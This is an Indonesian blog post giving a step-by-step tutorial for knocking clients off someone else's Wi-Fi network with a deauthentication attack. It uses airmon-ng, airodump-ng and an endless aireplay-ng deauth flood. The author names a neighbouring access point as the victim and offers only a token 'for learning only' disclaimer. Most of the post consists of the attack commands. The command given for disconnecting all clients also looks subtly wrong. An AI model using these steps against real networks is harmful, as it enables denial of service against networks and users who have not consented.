[HACKING] Deauthentication Attack Akses Point menggunakan Aireplay-ng - Bahrian Network

bahriannetwork.id

Post Top Ad

[HACKING] Deauthentication Attack Akses Point menggunakan Aireplay-ng

Share This
Assalamualaikum.Wrb.
Hallo kawan selamat datang di blog Networking Indonesia yaitu blog yang membahas seputar IT di Indonesia dan di Dunia.Pada postingan kali ini saya akan membahas cara memutuskan jaringan wifi orang lain hehe atau bahasa kerennya deauthentication.

Peringatan Ini hanya untuk pembelajaran semata Jangan di salah gunakan pada tindak kejahatan.

Pertama kita buka terminal dan masukan perintah airmon-ng start wlan0 penjelasan wlan0 adalah nama interface wifinya saya,pastikan sudah aktif di mode monitor.


Kedua kita cek interfaces dengan ifconfig otomatis yang tadinya wlan0 akan berubah menjadi wlan0mon.


Ketiga kita akan melihat informasi atau akses point di sekitar kita dengan perintah airodump-ng wlan0mon di sini saya akan eksekusi Akses Point Muhyi yang telah ke detec.


Keempat kita akan melihat client mana saja yang terhubung ke jaringan Wifi tersebut dengan perintah airodump-ng -c (CH) --bssid (BSSID) wlan0mon.


Kelima disini kita akan memutuskan jaringan wifi orang lain yang terhubung ke Akses Point korban saya dengan perintah aireplay-ng --deauth 0 -a (Bssid) -c (Mac Address) wlan0mon penjelasan 0 ialah serangan tanpa henti,lalu bagaimana jika kita ingin semua client terputus jaringan wifi tersebut masukan saja perintah aireplay-ng --deauth 0 -a (Bssid) -c (Bssid) wlan0mon.


Maka otomatis jaringan wifi korban tidak akan terhubung ke Akses Point sampai kita memberhentikannya.

Sudah selesai Cukup mudah bukan hehe,bila ada kesalahan step mohon di beritahukan di coment sekian dari saya Wassalamualaikum.Wrb.

1 comment:

Post Bottom Ad

Pages

Night Mode